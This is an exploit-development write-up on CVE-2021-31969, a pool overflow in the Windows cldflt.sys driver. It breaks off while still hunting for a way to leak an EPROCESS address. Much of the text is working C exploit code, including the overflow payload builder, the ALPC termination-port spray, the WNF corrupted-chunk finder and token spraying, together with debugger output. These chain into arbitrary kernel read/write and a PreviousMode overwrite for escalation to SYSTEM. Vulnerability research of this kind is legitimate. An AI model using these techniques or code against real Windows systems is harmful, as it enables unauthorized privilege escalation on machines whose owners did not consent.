The prevalence of memory corruption bugs persists, posing a persistent challenge for exploitation. This increased difficulty arises from advancements in defensive mechanisms and the escalating complexity of software systems. While a basic proof of concept often suffices for bug patching, the development of a functional exploit capable of bypassing existing countermeasures provides valuable insights into the capabilities of advanced threat actors. This holds particularly true for the scrutinized driver, cldflt.sys
, which has consistently received patches every Patch Tuesday since June. Notably, it has become a focal point for threat actors, following the exploits on clfs.sys
and afd.sys
drivers. In this article, we aim to highlight the significance of cldflt.sys and advocate for increased research into this driver and its associated components.
Now turning to the specific vulnerability, CVE-2021-31969
initially appears challenging to exploit due to its restrictive nature. However, by manipulating the paged pool, it is feasible to elevate a seemingly isolated pool overflow into a comprehensive arbitrary read/write scenario. This exploit grants elevated access, allowing the attainment of a shell as SYSTEM.
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
OS: Windows 10 1809
Binary: cldflt.sys
Version: KB5003217
Hash: 316016b70cd25ad43a0710016c85930616fe85ebd69350386f6b3d3060ec717e
v7 = *(_DWORD *)(a1 + 8);
someSize = HIWORD(v7);
if ( !_bittest((const int *)&v7, 0xFu) )
{
*a3 = a1;
return (unsigned int)v3;
}
allocatedSize = someSize + 8;
allocatedMem = ExAllocatePoolWithTag(PagedPool, someSize + 8, 'pRsH');
allocatedMemRef = allocatedMem;
if ( !allocatedMem )
{
LODWORD(v3) = -1073741670;
goto LABEL_3;
}
*(_QWORD *)allocatedMem = *(_QWORD *)a1;
*((_DWORD *)allocatedMem + 2) = *(_DWORD *)(a1 + 8);
v3 = (unsigned int)RtlDecompressBuffer(
COMPRESSION_FORMAT_LZNT1,
(PUCHAR)allocatedMem + 12,// uncompressed_buffer
allocatedSize - 12, // uncompressed_buffer_size
(PUCHAR)(a1 + 12),
a2 - 12,
(PULONG)va);
Version: KB5003646
Hash: 5cef11352c3497b881ac0731e6b2ae4aab6add1e3107df92b2da46b2a61089a9
someSize = *(_WORD *)(a1 + 10);
if ( someSize >= 4u )
{
if ( (*(_DWORD *)(a1 + 8) & 0x8000) == 0 )
{
*a3 = a1;
return (unsigned int)status;
}
allocatedSize = someSize + 8;
allocatedMem = ExAllocatePoolWithTag(PagedPool, allocatedSize, 'pRsH');
allocatedMemRef = allocatedMem;
if ( !allocatedMem )
{
LODWORD(status) = 0xC000009A;
goto LABEL_3;
}
*(_QWORD *)allocatedMem = *(_QWORD *)a1;
*((_DWORD *)allocatedMem + 2) = *(_DWORD *)(a1 + 8);
status = (unsigned int)RtlDecompressBuffer(
COMPRESSION_FORMAT_LZNT1,
(PUCHAR)allocatedMem + 12,// uncompressed_buffer
allocatedSize - 12,// uncompressed_buffer_size
(PUCHAR)(a1 + 12),
a2 - 12,
(PULONG)va);
The introduced patch incorporates a validation mechanism to guarantee a minimum value of 4 for the variable someSize
.
Preceding the application of this patch, the variable someSize
lacked a lower limit of 4, potentially resulting in a scenario where the variable allocatedSize
could fall below 12. Consequently, instances arose where the UncompressedBufferSize
parameter supplied to the RtlDecompressBuffer
function assumed negative values, triggering an unsigned integer underflow that cyclically wraps around to 0xFFFFFFF4
.
Based on the LZNT1 Specification, the first WORD in the compressed buffer is a header, which contains metadata such as whether the buffer is compressed and its size.
The compressed data is contained in a single chunk. The chunk header, interpreted as a 16-bit value, is 0xB038. Bit 15 is 1, so the chunk is compressed; bits 14 through 12 are the correct signature value (3); and bits 11 through 0 are decimal 56, so the chunk is 59 bytes in size.
Since the header is user controllable, it is possible to mark the buffer as uncompressed.
This leads to RtlDecompressBuffer
behaving like memcpy
.
With size and data under user control, a controlled paged-pool overflow is possible.
Variable a1
shown above is a REPARSE_DATA_BUFFER
type.
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;
GenericReparseBuffer.DataBuffer
contains custom data set by the filter driver.
struct cstmData
{
WORD flag;
WORD cstmDataSize;
UCHAR compressedBuffer[1];
};
The first WORD is a flag, followed by a size that influences pool allocation, and finally the compressed buffer passed to RtlDecompressBuffer
.
This data is stored inside the directory’s reparse tag, and will be retrieved and decompressed under various conditions mentioned below.
HsmpRpReadBuffer:
v9 = (unsigned int)FltFsControlFile(
Instance,
FileObject,
FSCTL_GET_REPARSE_POINT,
0i64,
0,
reparseData,
0x4000u,
0i64);
...
status = HsmpRpiDecompressBuffer(reparseData, reparseDataSize, someOut);
On a fresh copy of Windows 10 1809, the minifilter is not attached to any drives by default.
Registration is required to attach it.
HRESULT RegisterAndConnectSyncRoot(LPCWSTR Path, CF_CONNECTION_KEY *Key)
{
HRESULT status = S_OK;
CF_SYNC_REGISTRATION reg = { sizeof(CF_SYNC_REGISTRATION) };
CF_SYNC_POLICIES pol = { sizeof(CF_SYNC_POLICIES) };
CF_CALLBACK_REGISTRATION table[1] = { CF_CALLBACK_REGISTRATION_END };
reg.ProviderName = L"HackProvider";
reg.ProviderVersion = L"99";
pol.Hydration.Primary = CF_HYDRATION_POLICY_FULL;
pol.Population.Primary = CF_POPULATION_POLICY_FULL;
pol.PlaceholderManagement = CF_PLACEHOLDER_MANAGEMENT_POLICY_CONVERT_TO_UNRESTRICTED;
if ((status = CfRegisterSyncRoot(Path, ®, &pol, 0)) == S_OK)
status = CfConnectSyncRoot(Path, table, 0, CF_CONNECT_FLAG_NONE, Key);
return status;
}
Now it will respond to filesystem actions through its registered pre/post op handlers.
By profiling the handlers and tracing with proximity view, we can find some paths that may trigger the decompression: Operations such as converting a file to a placeholder, obtaining(creating) a file handle or renaming a file could lead to decompression.
As an example, this is the callstack when obtaining a handle to a file inside a syncroot directory:
4: kd> k
# Child-SP RetAddr Call Site
00 ffff8689`7915cf78 fffff807`5505722b cldflt!HsmpRpiDecompressBuffer
01 ffff8689`7915cf80 fffff807`5503e4b2 cldflt!HsmpRpReadBuffer+0x267
02 ffff8689`7915cff0 fffff807`5505fd29 cldflt!HsmpSetupContexts+0x27a
03 ffff8689`7915d120 fffff807`5505fea9 cldflt!HsmiFltPostECPCREATE+0x47d
04 ffff8689`7915d1c0 fffff807`52a3442e cldflt!HsmFltPostCREATE+0x9
05 ffff8689`7915d1f0 fffff807`52a33cf3 FLTMGR!FltpPerformPostCallbacks+0x32e
14: kd> dt _FILE_OBJECT @rdx
ntdll!_FILE_OBJECT
+0x000 Type : 0n5
+0x002 Size : 0n216
+0x008 DeviceObject : 0xffff8687`c43a8c00 _DEVICE_OBJECT
+0x010 Vpb : 0xffff8687`c43f69a0 _VPB
+0x018 FsContext : 0xffff9985`38f8e6f0 Void
+0x020 FsContext2 : 0xffff9985`36ff4a00 Void
+0x028 SectionObjectPointer : (null)
+0x030 PrivateCacheMap : (null)
+0x038 FinalStatus : 0n0
+0x040 RelatedFileObject : (null)
+0x048 LockOperation : 0 ''
+0x049 DeletePending : 0 ''
+0x04a ReadAccess : 0x1 ''
+0x04b WriteAccess : 0 ''
+0x04c DeleteAccess : 0 ''
+0x04d SharedRead : 0x1 ''
+0x04e SharedWrite : 0x1 ''
+0x04f SharedDelete : 0x1 ''
+0x050 Flags : 0x40002
+0x058 FileName : _UNICODE_STRING "\Windows\Temp\hax\vuln"
+0x068 CurrentByteOffset : _LARGE_INTEGER 0x0
+0x070 Waiters : 0
+0x074 Busy : 1
+0x078 LastLock : (null)
+0x080 Lock : _KEVENT
+0x098 Event : _KEVENT
+0x0b0 CompletionContext : (null)
+0x0b8 IrpListLock : 0
+0x0c0 IrpList : _LIST_ENTRY [ 0xffff8e85`b1dc0910 - 0xffff8e85`b1dc0910 ]
+0x0d0 FileObjectExtension : (null)
This means we can write arbitrary reparse data into a created directory inside syncroot and obtain a handle to it in order to trigger the pool overflow.
CreateDirectoryW(OverwriteDir, NULL);
hOverwrite = CreateFileW(
OverwriteDir,
GENERIC_ALL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS,
NULL
);
status = DeviceIoControl(
hOverwrite,
FSCTL_SET_REPARSE_POINT_EX,
newReparseData,
newSize,
NULL,
0,
&returned,
NULL
);
CloseHandle(hOverWrite);
// Trigger Bug
hOverwrite = CreateFileW(
OverwriteDir,
GENERIC_ALL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS,
NULL
);
FSCTL_SET_REPARSE_POINT_EX
is used because the driver registered a pre-op handler for FSCTL_SET_REPARSE_POINT
which denies our request.
if ( v2->Parameters.FileSystemControl.Buffered.InputBufferLength >= 4
&& (Context && (*(_DWORD *)(*((_QWORD *)Context + 2) + 0x1Ci64) & 1) != 0
|| (*(_DWORD *)v2->Parameters.FileSystemControl.Buffered.SystemBuffer & 0xFFFF0FFF) == dword_1E4F0) )
{
if ( Context )
{
v3 = *((_QWORD *)Context + 2);
v4 = *(_QWORD *)(*(_QWORD *)(v3 + 16) + 32i64);
}
HsmDbgBreakOnStatus(0xC000CF18);
if ( WPP_GLOBAL_Control != (PDEVICE_OBJECT)&WPP_GLOBAL_Control
&& (HIDWORD(WPP_GLOBAL_Control->Timer) & 1) != 0
&& BYTE1(WPP_GLOBAL_Control->Timer) >= 2u )
{
WPP_SF_qqqd(
WPP_GLOBAL_Control->AttachedDevice,
17i64,
&WPP_7c63b6f3d9f33043309d9f605c648752_Traceguids,
Context,
v3,
v4,
0xC000CF18);
}
a1->IoStatus.Information = 0i64;
v7 = 4;
a1->IoStatus.Status = 0xC000CF18;
}
The check lies in (*(_DWORD *)(*((_QWORD *)Context + 2) + 0x1Ci64) & 1) != 0
.
Context
is not under user control, hence this call will always fail.
As mentioned above, we can control the compressed buffer contents to make RtlDecompressBuffer
behave like memcpy
.
// controlled size, controlled content overflow!
*(WORD *)&payload[0] = 0x8000; // pass flag check
*(WORD *)&payload[2] = 0x0; // size to trigger underflow
*(WORD *)&payload[4] = 0x30-1; // lznt1 header: uncompressed, 0x30 size
memset(&payload[6], 'B', 0x100);
This specific reparse buffer leads to a 0x20 sized allocation in the paged pool.
1: kd> !pool @rax
Pool page ffff9f0ab3547090 region is Paged pool
ffff9f0ab3547000 size: 60 previous size: 0 (Free) ....
ffff9f0ab3547060 size: 20 previous size: 0 (Allocated) Via2
*ffff9f0ab3547080 size: 20 previous size: 0 (Allocated) *HsRp
Owning component : Unknown (update pooltag.txt)
ffff9f0ab35470a0 size: 20 previous size: 0 (Allocated) Ntfo
ffff9f0ab35470c0 size: 20 previous size: 0 (Allocated) ObNm
ffff9f0ab35470e0 size: 20 previous size: 0 (Allocated) PsJb
ffff9f0ab3547100 size: 20 previous size: 0 (Allocated) VdPN
ffff9f0ab3547120 size: 20 previous size: 0 (Allocated) Via2
However the crafted LZNT1 header will result in 0x30 Bs being copied to memory starting from an offset of 0xC for a pool allocation that can only hold 0x10 bytes of user data, therefore causing an overflow of 0x2C bytes, corrupting neighbouring chunks and eventually causing a BSOD.
4: kd> g
KDTARGET: Refreshing KD connection
*** Fatal System Error: 0x0000007e
(0xFFFFFFFFC0000005,0xFFFFF804044ED09A,0xFFFFDA8F76595748,0xFFFFDA8F76594F90)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
The content and size of overflow is fully under our control, whereas the allocated chunk is fixed at 0x20 bytes.
We only get one chance to overflow so we’ll wish for an object that can perform both read and write.
On modern Windows, pool allocations smaller than 0x200 bytes is managed by the Low Fragmentation Heap
(LFH) if it’s active. For common sizes like 0x20, the LFH bucket for it is undoubtedly activated by the time the exploit commences. Under control of the LFH, the vulnerable chunk will only be positioned adjacent to other 0x20 sized chunks in the same bucket, which prevents the easy way of overflowing into an adjacent powerful object like WNF to improve the primitive. Furthermore, finding a 0x20 sized object to achieve both arbitrary read and write is difficult, because a 0x20 sized allocation can only really hold 0x10 bytes of data.
Before proceeding with exploitation, it’s important to fully understand the primitive at hand. For an overflow that invovles exploring its maximum possible size.
Although it may seem like the maximum size we can specify in the LZNT1 header is only 0xFFF, that’s only for one compressed chunk.
typedef struct
{
WORD Size;
BYTE Data[4096];
} LZNT1Chunk;
Each structure above describes a page-sized chunk.
By allocating multiple structures, we can write up to 0xFFFFFFFF bytes with RtlDecompressBuffer
.
void CreatePayload(PBYTE *CreatedPayload)
{
WORD *payload = NULL;
LZNT1Chunk *buf = NULL;
DWORD remaining = OVERFLOW_SIZE;
DWORD pagesToOverflow = 0;
DWORD effectiveSize = 0;
pagesToOverflow = (remaining % PAGE_SIZE) ? (remaining / PAGE_SIZE) + 1 : (remaining / PAGE_SIZE);
payload = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(LZNT1Chunk) * pagesToOverflow + 4); // metadata
if (!payload) {
printf("[-] HeapAlloc fail: 0x%08X\n", GetLastError());
return;
}
payload[0] = 0x8000; // pass flag check
payload[1] = 0; // trigger integer underflow
buf = (ULONG64)payload + 4;
for (int i = 0; i < pagesToOverflow; i++) {
if (remaining >= PAGE_SIZE)
buf[i].Size = PAGE_SIZE - 1;
else
buf[i].Size = remaining - 1;
effectiveSize = buf[i].Size + 1;
for (int j = 0; j < effectiveSize / sizeof(DWORD); j++)
((DWORD *)(&buf[i].Data))[j] = PAGE_SIZE; // spray 0x1000 values
remaining -= PAGE_SIZE;
}
*CreatedPayload = payload;
return;
}
However, recall that the HsmpRpReadBuffer
function only retrieves up to 0x4000 bytes of reparse data, including headers. This leaves us with a maximum of less than 4 pages to overflow.
The only logical way is still to overflow into an object that grants us more control, which is probably of another size. With about 4 pages of data to write, maybe we can write past the LFH completely? Maybe into another subsegment?
By allocating a large amount of 0x20 chunks in the paged pool, we get to exhaust all currently available 0x20 LFH buckets. When that happens, the backend allocator allocates a new segment for some new LFH buckets.
At the same time, we allocate a large amount of _WNF_STATE_DATA
and _TOKEN
objects adjacent to each other in the same page. This will hopefully exhaust all currently available VS subsegments, forcing the frontend allocator to allocate new VS subsegments.
Different subsegment types(LFH/VS) can be contiguous in pool memory. This means if we’re lucky(and spray enough), we can end up with a LFH bucket adjacent to a VS subsegment in memory.
If there are less than 4 pages of LFH buckets between the victim chunk and a VS subsegment, we can overflow into the VS subsegment and gain control over the WNF and TOKEN objects residing there.
The overflow data will consist of DWORDS with value 0x1000. The goal is to overwrite _WNF_STATE_DATA->AllocatedSize
and _WNF_STATE_DATA->DataSize
with 0x1000, giving us relative page read/write primitive which we’ll use to manipulate the _TOKEN
object right after it.
There exists an object named _TERMINATION_PORT
that leads to a 0x20 sized allocation and can be freely allocated.
//0x10 bytes (sizeof)
struct _TERMINATION_PORT
{
struct _TERMINATION_PORT* Next; //0x0
VOID* Port; //0x8
};
By invoking NtRegisterThreadTerminatePort
with an ALPC(LPC) Port object, we can allocate an instance of _TERMINATION_PORT
in the paged pool.
void SprayTerminationPort(DWORD *Count)
{
ALPC_PORT_ATTRIBUTES alpcAttr = { 0 };
OBJECT_ATTRIBUTES objAttr = { 0 };
HANDLE hConnPort = NULL;
UNICODE_STRING uPortName = { 0 };
NTSTATUS status = STATUS_SUCCESS;
RtlInitUnicodeString(&uPortName, L"\\RPC Control\\My ALPC Test Port");
InitializeObjectAttributes(&objAttr, &uPortName, 0, NULL, NULL);
alpcAttr.MaxMessageLength = AlpcMaxAllowedMessageLength();
status = NtAlpcCreatePort(&hConnPort, &objAttr, &alpcAttr);
if (!NT_SUCCESS(status)) {
printf("[-] NtAlpcCreatePort Error: 0x%08X\n", status);
return;
}
for (int i = 0; i < *Count; i++)
NtRegisterThreadTerminatePort(hConnPort);
printf("[+] Sprayed 0x%lx _TERMINATION_PORT objects\n", *Count);
g_TerminationPortSprayDone = 1;
while (!g_FreeTerminationPortObjects)
Sleep(1500);
return;
}
This object will be tagged onto the current thread’s _ETHREAD
object and will be freed when the thread terminates.
All steps to perform a controlled overflow are detailed above. Assuming we have successfully overflown into a VS subsegment, what are the next steps?
It’s a good sign if the OS hasn’t crashed by the time we finish overflowing. It at least means we did not write into unmapped memory. By querying all WNF chunks, we can find chunks that are successfully overwritten.
int WnfFindUsableCorruptedChunk(DWORD WnfObjectSize)
{
WNF_CHANGE_STAMP stamp = 0;
BYTE buf[PAGE_SIZE];
DWORD bufSize = WnfObjectSize;
DWORD wnfToTokenOffset = WnfObjectSize + 0x50;
NTSTATUS status = STATUS_SUCCESS;
for (int i = 0; i < g_WnfCount; i++) {
status = NtQueryWnfStateData(&g_Statenames[i], NULL, NULL, &stamp, &buf, &bufSize);
bufSize = WnfObjectSize;
if (status != STATUS_BUFFER_TOO_SMALL)
continue;
printf("[*] Found corrupted chunk: 0x%lx\n", i);
bufSize = PAGE_SIZE;
status = NtQueryWnfStateData(&g_Statenames[i], NULL, NULL, &stamp, &buf, &bufSize);
if (!NT_SUCCESS(status)) {
puts("something weird");
printf("0x%08X\n", status);
continue;
}
if (*(DWORD *)((ULONG64)buf + wnfToTokenOffset) == 0x1000)
continue;
printf("[*] Found usable chunk: 0x%lx\n", i);
return i;
}
return -1;
}
First perform a query with the initial DataSize
allocated. Objects that are not overflown will respond without error, but objects that have their DataSize
enlarged to 0x1000 will return STATUS_BUFFER_TOO_SMALL.
Now we check if we are able to use this object for exploitation.
The criteria is an untouched _TOKEN
object after it.
To identify the target _TOKEN
object by its handle, we can allocate two arrays prior to spraying to store all handles and IDs.
BOOL TokenAllocateObject(void)
{
BOOL status = TRUE;
HANDLE hOriginal = NULL;
DWORD returnLen = 0;
TOKEN_STATISTICS stats = { 0 };
status = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hOriginal);
if (!status) {
printf("[-] OpenProcessToken fail: 0x%08x\n", GetLastError());
hOriginal = NULL;
goto out;
}
// Allocates a _TOKEN object in kernel pool
status = DuplicateTokenEx(hOriginal, MAXIMUM_ALLOWED, NULL, SECURITY_ANONYMOUS, TokenPrimary, &g_Tokens[g_TokenCount]);
if (!status) {
printf("[-] DuplicateTokenEx fail: 0x%08x\n", GetLastError());
status = FALSE;
goto out;
}
status = GetTokenInformation(g_Tokens[g_TokenCount], TokenStatistics, &stats, sizeof(TOKEN_STATISTICS), &returnLen);
if (!status) {
printf("[-] GetTokenInformation fail: 0x%08x\n", GetLastError());
status = FALSE;
goto out;
}
g_TokenIds[g_TokenCount] = stats.TokenId.LowPart; // High part is always 0
g_TokenCount++;
out:
if (hOriginal)
CloseHandle(hOriginal);
return status;
}
Relative read with WNF allows us to extract the TokenId
member in pool memory and identify its corresponding handle.
The _TOKEN
object contains many pointers we can modify to gain arbitrary read/write using Win32 APIs.
NtQueryInformationToken:
case TokenBnoIsolation:
}
if ( Token->BnoIsolationHandlesEntry )
{
*((_BYTE *)TokenInformation + 8) = 1;
*(_QWORD *)TokenInformation = (char *)TokenInformation + 16;
memmove(
(char *)TokenInformation + 16,
Token->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.Buffer,
Token->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.MaximumLength);
}
By setting Token->BnoIsolationHandlesEntry
to a usermode buffer, we can forge fields for EntryDescriptor.IsolationPrefix.Buffer
and EntryDescriptor.IsolationPrefix.MaximumLength
.
The data will be copied to TokenInformation + 16
, which is another usermode buffer we supply to the API.
NtSetInformationToken:
This function calls into SepAppendDefaultDacl
if we specify TokenDefaultDacl
as TokenInformationClass
void *__fastcall SepAppendDefaultDacl(_TOKEN *Token, unsigned __int16 *UserBuffer)
{
int v3; // edi
_ACL *v4; // rbx
void *result; // rax
v3 = UserBuffer[1];
v4 = (_ACL *)&Token->DynamicPart[*(unsigned __int8 *)(Token->PrimaryGroup + 1) + 2];
result = memmove(v4, UserBuffer, UserBuffer[1]);
Token->DynamicAvailable -= v3;
Token->DefaultDacl = v4;
return result;
}
By pointing Token->PrimaryGroup
to one byte before memory that contains a null, we can make *(unsigned __int8 *)(Token->PrimaryGroup + 1) + 2
equal to 2.
We can’t make it 0 because it’s an unsigned byte operation zero-extended to 64-bits, as shown by the assembly:
movzx r8d, byte ptr [rax+1]
mov rax, [rcx+0B0h]
add rax, 8
lea rbx, [rax+r8*4]
Then we can set DynamicPart
to arbitrary address - 0x8
and gain arbitrary write.
There’s a catch though.
DynamicPart
and PrimaryGroup
should point to the same address, otherwise there will be an unwanted memmove
corrupting memory.
SepFreeDefaultDacl:
DynamicPart = TokenObject->DynamicPart;
PrimaryGroup = (unsigned __int8 *)TokenObject->PrimaryGroup;
if ( DynamicPart != (unsigned int *)PrimaryGroup )
{
memmove(DynamicPart, PrimaryGroup, 4i64 * PrimaryGroup[1] + 8);
result = (__int64)TokenObject->DynamicPart;
TokenObject->PrimaryGroup = result;
}
To make things more restrictive, UserBuffer[1]
used as size field must also be at least 0x8, which means the size field will clobber two bytes of the write destination.
UserBuffer
is also casted as an ACL and has to pass ACL checks.
//0x8 bytes (sizeof)
struct _ACL
{
UCHAR AclRevision; //0x0
UCHAR Sbz1; //0x1
USHORT AclSize; //0x2
USHORT AceCount; //0x4
USHORT Sbz2; //0x6
};
That restricts the value of the AclRevision
member between 2 and 4.
if ( (unsigned __int8)(Acl->AclRevision - 2) <= 2u )
AclCount
should also be 0 to bypass further checks.
The final buffer written should look like this:
0x2 0x0 0x8 0x0 0x0 0x0 0x0 0x0
Rev Sbz1 Sz-1 Sz-2 Cnt-1 Cnt-2 Sbz2-1 Sbz2-2
This is not a great primitive, but should still allow us to null out the PreviousMode
field of our exploit thread due to the naturally occuring memory layout in that region.
More specifically, we can point both DynamicPart
and PrimaryGroup
to _KTHREAD+0x229
.
5: kd> dq 0xffffb186051c8378-0x2f8+0x229
ffffb186`051c82a9 00000000`000000ff 40010000`00090100
ffffb186`051c82b9 ff000000`00000000 00000000`000000ff
ffffb186`051c82c9 05000000`0f010000 00000000`00000000
ffffb186`051c82d9 00000000`00000000 00000000`00000000
ffffb186`051c82e9 00000000`00000000 00000000`00000000
ffffb186`051c82f9 00000000`00000000 12000000`00100000
ffffb186`051c8309 80000000`00065800 00ffffb1`86051c80
ffffb186`051c8319 00000000`00000000 70000000`00000000
PrimaryGroup+1
will then point to null, copying the fake ACL to _KTHREAD+0x2b1
and allowing the 0x0 from Sbz1
to overwrite PreviousMode
.
This has a side effect of setting the BasePriority
of the thread to 0x8(THREAD_PRIORITY_BELOW_NORMAL), which isn’t too bad.
Armed with arbitrary read and the ability to null out PreviousMode
once we locate it, the greatest hurdle has been overcame. All that’s required is to find the address of the exploit thread’s PreviousMode
member.
Most escalation techniques, including this, require us to locate an EPROCESS
structure in kernel memory. Once we locate an arbitrary EPROCESS
, we can go through its ActiveProcessLinks
member to hunt for the exploit process as well as a system process.
On Windows versions before Windows 11 Build 25915, we can use the well known NtQuery*
APIs to leak kernel addresses, including our own EPROCESS address.
Since this will no longer work soon and we already have a flexible arbitrary read primitive, I’m looking for other ways to leak an EPROCESS address.
There are many ways to leak EPROCESS, such as reading the PsInitialSystemProcess
global variable or bruteforcing kernel address space.
I’ll show a shortcut to leaking an EPROCESS address from a known _TOKEN
object.
While browsing through members of the _TOKEN
object which we can already leak from the WNF
relative read, we can find a SessionObject
member that points to a chunk that resides in the non-paged 0xB0 LFH bucket.
12: kd> !pool 0xffff9788`30cf3bd0
Pool page ffff978830cf3bd0 region is Nonpaged pool
ffff978830cf3000 size: 50 previous size: 0 (Free) ....
ffff978830cf3050 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf3100 size: b0 previous size: 0 (Allocated) Filt
ffff978830cf31b0 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf3260 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf3310 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf33c0 size: b0 previous size: 0 (Allocated) inte
ffff978830cf3470 size: b0 previous size: 0 (Allocated) WPLg
ffff978830cf3520 size: b0 previous size: 0 (Allocated) ExTm
ffff978830cf35d0 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf3680 size: b0 previous size: 0 (Allocated) ExTm
ffff978830cf3730 size: b0 previous size: 0 (Allocated) ExTm
ffff978830cf37e0 size: b0 previous size: 0 (Allocated) inte
ffff978830cf3890 size: b0 previous size: 0 (Allocated) ITrk
ffff978830cf3940 size: b0 previous size: 0 (Allocated) ExTm
ffff978830cf39f0 size: b0 previous size: 0 (Allocated) inte
ffff978830cf3aa0 size: b0 previous size: 0 (Allocated) inte
*ffff978830cf3b50 size: b0 previous size: 0 (Allocated) *Sess
Owning component : Unknown (update pooltag.txt)
ffff978830cf3c00 size: b0 previous size: 0 (Allocated) Filt
ffff978830cf3cb0 size: b0 previous size: 0 (Allocated) MmMl
ffff978830cf3d60 size: b0 previous size: 0 (Allocated) PFXM
ffff978830cf3e10 size: b0 previous size: 0 (Allocated) inte
ffff978830cf3ec0 size: b0 previous size: 0 (Allocated) inte
If we browse the pool allocations around it, we can find many AlIn
tagged allocations.
12: kd> !pool 0xffff9788`30cf4000
Pool page ffff978830cf4000 region is Nonpaged pool
ffff978830cf4020 size: b0 previous size: 0 (Allocated) Sess
ffff978830cf40d0 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf4180 size: b0 previous size: 0 (Allocated) WPLg
ffff978830cf4230 size: b0 previous size: 0 (Allocated) Filt
ffff978830cf42e0 size: b0 previous size: 0 (Allocated) Filt
ffff978830cf4390 size: b0 previous size: 0 (Allocated) inte
ffff978830cf4440 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf44f0 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf45a0 size: b0 previous size: 0 (Allocated) inte
ffff978830cf4650 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4700 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf47b0 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4860 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4910 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf49c0 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4a70 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4b20 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4bd0 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4c80 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4d30 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4de0 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4e90 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4f40 size: b0 previous size: 0 (Allocated) AlIn
These allocations seem to always locate close to SessionObject
, and are abundant.
I do not know what datatype this allocation is, so I used windbg to dump pointers within it.
12: kd> .foreach (addr {dps ffff978830cf4c80 La0}) {!object addr}
ffff8f8ed1576618: Not a valid object (ObjectType invalid)
0: not a valid object (ObjectHeader invalid @ -offset 30)
4: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffff978830cf4cf8: Not a valid object (ObjectType invalid)
Object: ffff978832c67380 Type: (ffff978830805e60) IoCompletion
ObjectHeader: ffff978832c67350 (new version)
HandleCount: 1 PointerCount: 32748
264ffe62090: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffff978832728420: Not a valid object (ObjectType invalid)
ffff978830cf4c90: Not a valid object (ObjectType invalid)
ffff978830cf4cc8: Not a valid object (ObjectType invalid)
At allocation+0x38 holds a pointer to an IoCompletion
object, which I again have no idea regarding its type. Viewing pool layout around it shows that it’s being surrounded by many EtwR
objects consistently.
7: kd> !pool ffffd685bcbeb7c0
Pool page ffffd685bcbeb7c0 region is Nonpaged pool
ffffd685bcbeb000 size: 50 previous size: 0 (Free) ....
ffffd685bcbeb050 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb130 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb210 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb2f0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb3d0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb4b0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb590 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb670 size: e0 previous size: 0 (Allocated) EtwR
*ffffd685bcbeb750 size: e0 previous size: 0 (Allocated) *IoCo
Pooltag IoCo : Io completion, Binary : nt!io
ffffd685bcbeb830 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb910 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb9f0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbebad0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbebbb0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbebc90 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbebd70 size: e0 previous size: 0 (Allocated) IoCo
ffffd685bcbebe50 size: e0 previous size: 0 (Allocated) EtwR
This is a good sign, because if the EtwR
object can leak interesting pointers, it will be a consistent technique without the need to spray.
I continued to dump pointers on the EtwR
objects.
7: kd> .foreach (addr {dps ffffd685`bcbeb140 La0}) {!object addr}
ffffd685bcbeb140: Not a valid object (ObjectType invalid)
ffffd685bcbeb148: Not a valid object (ObjectType invalid)
48: not a valid object (ObjectHeader invalid @ -offset 30)
ffffd685bcbeb150: Not a valid object (ObjectType invalid)
fffff8012726ad00: Not a valid object (ObjectType invalid)
fffff8012726ad00: Not a valid object (ObjectType invalid)
ffffd685bcbeb158: Not a valid object (ObjectType invalid)
0: not a valid object (ObjectHeader invalid @ -offset 30)
